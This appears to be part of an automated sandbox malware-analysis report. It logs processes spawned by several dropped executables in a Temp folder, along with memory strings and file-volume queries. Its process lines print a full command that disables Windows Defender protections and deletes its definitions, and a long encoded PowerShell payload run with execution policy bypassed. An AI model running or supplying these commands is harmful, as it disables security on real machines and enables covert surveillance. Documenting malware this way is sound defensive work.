                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: skotes.exe, skotes.exe, 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000059.00000002.2801126317.00000000008CD000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: I4Program Manager
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmpBinary or memory string: Shell_TrayWnd
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmpBinary or memory string: Progman
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006ADD91 cpuid 3_2_006ADD91
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017902001\82191c1fe1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017903001\cb947ba4b8.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017903001\cb947ba4b8.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017906001\3b81e6737d.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017906001\3b81e6737d.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017907001\90ddd682ad.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017907001\90ddd682ad.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017915001\712b285aaa.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017915001\712b285aaa.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_ctypes.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
